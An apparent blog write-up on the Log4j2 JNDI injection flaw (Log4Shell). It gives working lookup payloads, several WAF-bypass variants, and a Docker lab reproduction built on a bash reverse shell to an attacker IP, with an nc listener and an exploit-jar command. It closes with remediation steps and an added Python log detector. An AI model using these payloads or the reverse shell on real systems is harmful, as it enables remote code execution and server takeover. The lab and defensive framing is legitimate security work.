Last updated: 2021-12-14 18:17:34

## **Principle**

The Log4j2 component has a JNDI injection flaw in the way it processes log records. An unauthenticated attacker can exploit it by sending specially crafted malicious data to the target server; this triggers the parsing flaw in Log4j2, leads to arbitrary code execution on the target, and hands over control of the target server.

https://mp.weixin.qq.com/s/15zcLEk6_x2enszhim9afA

## **Affected versions**

Apache Log4j 2.x <= 2.14.1

## **PoC**

`${jndi:ldap://xxx.dnslog.cn/poc}`

WAF bypass variants:

1. `${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://xxx.dnslog.cn/poc}`
2. `${${::-j}ndi:rmi://xxx.dnslog.cn/poc}`
3. `${jndi:rmi://xxx.dnslog.cn/poc}`
4. `${${lower:jndi}:${lower:rmi}://xxx.dnslog.cn/poc}`
5. `${${lower:${lower:jndi}}:${lower:rmi}://xxx.dnslog.cn/poc}`
6. `${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://xxx.dnslog.cn/poc}`

## **RCE exploitation**

Target: http://192.168.223.129:8080/

#### Setting up the target

1. Online platform: http://vulfocus.fofa.so/
2. Local setup:

> docker pull vulfocus/log4j2-rce-2021-12-09:latest
> docker run -d -p 8080:8080 vulfocus/log4j2-rce-2021-12-09:latest

#### Reproduction

First test with dnslog:

![2021-12-14T09:29:58.png][1]

![2021-12-14T09:30:14.png][2]

1. Set up an LDAP or RMI server.

[JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar][3]

Build the payload:

> bash -i > /dev/tcp/192.168.223.131/8566 0>&1

Listen on the port:

> nc -lvnp 8566

Convert it at https://www.jackson-t.ca/runtime-exec-payloads.html:

![2021-12-14T10:09:01.png][4]

> bash -c {echo,YmFzaCAtaSA+IC9kZXYvdGNwLzE5Mi4xNjguMjIzLjEzMS84NTY2IDA+JjE=}|{base64,-d}|{bash,-i}

Start the tool:

> java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+IC9kZXYvdGNwLzE5Mi4xNjguMjIzLjEzMS84NTY2IDA+JjE=}|{base64,-d}|{bash,-i}" -A "192.168.223.131"
> -C payload
> -A the attacker machine's IP

![2021-12-14T10:11:27.png][5]

The tool offers exploit entries for several Java versions; if one does not work, try another.

![2021-12-14T10:12:16.png][6]

Execution succeeds and a shell is obtained:

![2021-12-14T10:12:46.png][7]

## **Remediation**

1. Upgrade to the latest version.
2. Set the JVM parameter "-Dlog4j2.formatMsgNoLookups=true".
3. Set the system environment variable "FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS" to "true".
4. Block outbound network connections from the application.

[1]: https://cdn.jsdelivr.net/gh/R0A1NG/wenzhangupload@latest/usr/uploads/2021/12/3663888455.png
[2]: https://cdn.jsdelivr.net/gh/R0A1NG/wenzhangupload@latest/usr/uploads/2021/12/4167555695.png
[3]: https://www.lanzouy.com/iLyJTxlpxli
[4]: https://cdn.jsdelivr.net/gh/R0A1NG/wenzhangupload@latest/usr/uploads/2021/12/3590640741.png
[5]: https://cdn.jsdelivr.net/gh/R0A1NG/wenzhangupload@latest/usr/uploads/2021/12/95741944.png
[6]: https://cdn.jsdelivr.net/gh/R0A1NG/wenzhangupload@latest/usr/uploads/2021/12/1582023542.png
[7]: https://cdn.jsdelivr.net/gh/R0A1NG/wenzhangupload@latest/usr/uploads/2021/12/530452763.png
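As an added defensive example (not code from the original post), the Python below peels off the lookup-obfuscation layers used in the WAF-bypass PoCs above (the `${::-x}` empty-key default trick and `${lower:...}`/`${upper:...}` case lookups) the same inside-out way Log4j resolves them, then flags any surviving `${jndi:<scheme>:...}` in sample log lines. The function names and the sample lines are constructed for this example; only the obfuscation forms shown on this page are emulated, so treat it as a log-triage check rather than a complete Log4j lookup resolver.

```python
import re

# Innermost ${...} (no nested braces inside); resolved inside-out, as Log4j does.
INNERMOST = re.compile(r"\$\{([^{}]*)\}")
# After normalization a surviving jndi lookup is wrapped in \x00...\x01 markers.
JNDI = re.compile(r"\x00jndi:([a-z]+):", re.IGNORECASE)


def _resolve_one(inner: str) -> str:
    """Evaluate one obfuscation layer from the PoC list; keep anything else."""
    if inner.startswith("::-"):          # ${::-j}: empty key, default value "j"
        return inner[3:]
    head, sep, rest = inner.partition(":")
    if sep and head.lower() == "lower":  # ${lower:JNDI} -> jndi
        return rest.lower()
    if sep and head.lower() == "upper":  # ${upper:jndi} -> JNDI
        return rest.upper()
    # Unknown lookup (jndi:, env:, ...): re-wrap with non-brace markers so the
    # loop terminates while the lookup text stays visible to the JNDI check.
    return "\x00" + inner + "\x01"


def normalize(text: str, max_rounds: int = 32) -> str:
    """Peel ${::-x} / ${lower:..} / ${upper:..} layers until nothing changes."""
    for _ in range(max_rounds):
        new = INNERMOST.sub(lambda m: _resolve_one(m.group(1)), text)
        if new == text:
            break
        text = new
    return text


def find_jndi_lookups(line: str) -> list:
    """Return the JNDI URL schemes (ldap, rmi, ...) of lookups hidden in a line."""
    return [m.group(1).lower() for m in JNDI.finditer(normalize(line))]


# Constructed sample log lines (not from the page's lab); line 1 is benign.
SAMPLE_LOG = [
    'GET /index.html "Mozilla/5.0" 200',
    'GET / "${jndi:ldap://xxx.dnslog.cn/poc}" 200',
    'GET / "${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://xxx.dnslog.cn/poc}" 200',
    'GET / "${${lower:${lower:jndi}}:${lower:rmi}://xxx.dnslog.cn/poc}" 200',
    'GET / "${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://xxx.dnslog.cn/poc}" 200',
]


def scan(lines) -> list:
    """Return (line_number, scheme) for every line carrying a JNDI lookup."""
    return [(n, s) for n, line in enumerate(lines, 1) for s in find_jndi_lookups(line)]


if __name__ == "__main__":
    for n, scheme in scan(SAMPLE_LOG):
        print(f"line {n}: jndi lookup via {scheme}")
```

Because the check runs on the normalized string, a plain substring match for `jndi:` on the raw line would miss variants 1, 2, 5 and 6 from the PoC list while this one catches all of them.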